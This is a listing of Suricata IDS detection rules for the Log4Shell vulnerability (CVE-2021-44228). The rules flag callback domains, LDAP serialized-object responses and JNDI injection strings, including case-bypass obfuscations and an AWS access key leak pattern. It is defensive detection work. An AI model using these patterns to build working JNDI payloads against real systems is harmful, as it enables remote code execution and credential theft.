ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4shell .huntress .com)
Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4shell .huntress .com)"; dns.query; dotprefix; content:".log4shell.huntress.com"; nocase; endswith; reference:cve,2021-44228; classtype:domain-c2; sid:2034820; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, performance_impact Low, confidence High, signature_severity Informational, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (notburpcollaborator .net)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (notburpcollaborator .net)
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (notburpcollaborator .net)
Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (notburpcollaborator .net)"; dns.query; dotprefix; content:".notburpcollaborator.net"; nocase; endswith; reference:cve,2021-44228; classtype:domain-c2; sid:2034825; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (ceye .io)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (ceye .io)
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (ceye .io)
Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (ceye .io)"; dns.query; dotprefix; content:".ceye.io"; nocase; endswith; reference:cve,2021-44228; classtype:domain-c2; sid:2034822; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET INFO Serialized Java Object returned via LDAPv3 Response
suricata·2021-12-21
CVE-2021-44228 ET INFO Serialized Java Object returned via LDAPv3 Response
ET INFO Serialized Java Object returned via LDAPv3 Response
Rule: alert tcp any any -> $HOME_NET any (msg:"ET INFO Serialized Java Object returned via LDAPv3 Response"; flow:established,to_client; content:"|30|"; depth:1; content:"|04 0d|javaClassName"; fast_pattern; content:"|04 12|javaSerializedData"; distance:0; content:"|ac ed|"; within:10; reference:url,ldap.com/ldapv3-wire-protocol-reference-ldap-result/; reference:url,ldap.com/ldapv3-wire-protocol-reference-search/; reference:cve,2021-44228; classtype:bad-unknown; sid:2034818; rev:2; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4j .binaryedge .io)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4j .binaryedge .io)
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4j .binaryedge .io)
Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4j .binaryedge .io)"; dns.query; dotprefix; content:".log4j.binaryedge.io"; nocase; endswith; reference:cve,2021-44228; classtype:domain-c2; sid:2034819; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, performance_impact Low, confidence High, signature_severity Informational, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (oob .li)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (oob .li)
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (oob .li)
Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (oob .li)"; dns.query; dotprefix; content:".oob.li"; nocase; endswith; reference:cve,2021-44228; classtype:domain-c2; sid:2034823; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (log .exposedbotnets .ru)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (log .exposedbotnets .ru)
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (log .exposedbotnets .ru)
Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (log .exposedbotnets .ru)"; dns.query; dotprefix; content:".log.exposedbotnets.ru"; nocase; endswith; reference:cve,2021-44228; classtype:domain-c2; sid:2034830; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (canarytokens .com)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (canarytokens .com)
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (canarytokens .com)
Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (canarytokens .com)"; dns.query; content:".l4j."; nocase; content:".canarytokens.com"; nocase; endswith; fast_pattern; reference:cve,2021-44228; classtype:domain-c2; sid:2034832; rev:2; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (service .exfil .site)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (service .exfil .site)
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (service .exfil .site)
Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (service .exfil .site)"; dns.query; dotprefix; content:".service.exfil.site"; nocase; endswith; reference:cve,2021-44228; classtype:domain-c2; sid:2034827; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (scannermcscanface-edgescan .com)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (scannermcscanface-edgescan .com)
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (scannermcscanface-edgescan .com)
Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (scannermcscanface-edgescan .com)"; dns.query; dotprefix; content:".scannermcscanface-edgescan.com"; nocase; endswith; reference:cve,2021-44228; classtype:domain-c2; sid:2034826; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET INFO DNS Query for Observed CVE-2021-44228 Security Scanner Domain (dns .cyberwar .nl)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET INFO DNS Query for Observed CVE-2021-44228 Security Scanner Domain (dns .cyberwar .nl)
ET INFO DNS Query for Observed CVE-2021-44228 Security Scanner Domain (dns .cyberwar .nl)
Rule: alert dns $HOME_NET any -> any any (msg:"ET INFO DNS Query for Observed CVE-2021-44228 Security Scanner Domain (dns .cyberwar .nl)"; dns.query; dotprefix; content:".dns.cyberwar.nl"; nocase; endswith; reference:cve,2021-44228; classtype:policy-violation; sid:2034829; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Informational, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (scanworld .net)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (scanworld .net)
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (scanworld .net)
Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (scanworld .net)"; dns.query; dotprefix; content:".scanworld.net"; nocase; endswith; reference:cve,2021-44228; classtype:domain-c2; sid:2034828; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4j. leakix .net)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4j. leakix .net)
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4j. leakix .net)
Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4j. leakix .net)"; dns.query; content:"log4j.leakix.net"; nocase; endswith; reference:cve,2021-44228; reference:url,twitter.com/VessOnSecurity/status/1473414886533304322; classtype:domain-c2; sid:2034831; rev:2; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_01_04;)
Suricata
ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response M2
suricata·2021-12-20·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response M2
ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response M2
Rule: alert tcp $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response M2"; flow:established,to_client; content:"|30|"; startswith; content:"|04 0d|javaClassName"; fast_pattern; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 12|javaSerializedData"; within:25; content:"|ac ed|"; within:10; content:"|2e|exec"; distance:0; content:"FromCharCode"; nocase; distance:0; reference:url,ldap.com/ldapv3-wire-protocol-reference-ldap-result/; reference:url,ldap.com/ldapv3-wire-protocol-reference-search/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034769; rev:2; metadata:created_at 2021_12_20, cve CVE_2021_44228, co
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228)
suricata·2021-12-20·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228)"; content:"|24 7b|upper|3a|j"; nocase; fast_pattern; content:"n"; within:12; content:"d"; within:12; content:"i"; within:12; reference:cve,2021-44228; classtype:attempted-admin; sid:2034811; rev:2; metadata:created_at 2021_12_20, cve CVE_2021_44228, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228)
suricata·2021-12-20·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|lower|3a|j"; nocase; fast_pattern; content:"n"; within:12; content:"d"; within:12; content:"i"; within:12; reference:cve,2021-44228; classtype:attempted-admin; sid:2034808; rev:2; metadata:created_at 2021_12_20, cve CVE_2021_44228, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228)
suricata·2021-12-20·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|upper|3a|j"; nocase; fast_pattern; content:"n"; within:12; content:"d"; within:12; content:"i"; within:12; reference:cve,2021-44228; classtype:attempted-admin; sid:2034810; rev:2; metadata:created_at 2021_12_20, cve CVE_2021_44228, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228)
suricata·2021-12-20·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228)"; content:"|24 7b|lower|3a|j"; nocase; fast_pattern; content:"n"; within:12; content:"d"; within:12; content:"i"; within:12; reference:cve,2021-44228; classtype:attempted-admin; sid:2034809; rev:2; metadata:created_at 2021_12_20, cve CVE_2021_44228, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (Outbound) (CVE-2021-44228)
suricata·2021-12-18·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (Outbound) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|lower|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034802; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_18, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Applicati
Suricata
ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (Outbound) (CVE-2021-44228)
suricata·2021-12-18·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; content:"|24 7b|env|3a|AWS_ACCESS_KEY_ID"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034807; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_18, mitre_tactic_id TA0001,
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (Outbound) (CVE-2021-44228)
suricata·2021-12-18·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (Outbound) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (Outbound) (CVE-2021-44228)"; content:"|24 7b|"; content:"|24 7b 3a 3a|"; within:100; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034805; rev:3; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2023_06_05, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (Outbound) (CVE-2021-44228)
suricata·2021-12-18·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (Outbound) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; content:"|24 7b|env|3a|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034806; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (Outbound) (CVE-2021-44228)
suricata·2021-12-18·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (Outbound) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|lower|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034803; rev:2; metadata:attack_target Server, created_at 2021_12_18, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_18, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (Outbound) (CVE-2021-44228)"; content:"|24 7b 24 7b|upper|3a 24 7b|upper|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034795; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (Outbound) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|corba|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034789; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034760; rev:3; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_05_03;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034762; rev:3; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_05_03;)
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (Outbound) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|upper|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034801; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_18, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (Outbound) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|corba|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034790; rev:2; metadata:attack_target Client_and_Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_17;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|iiop|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034788; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (Outbound) (CVE-2021-44228)
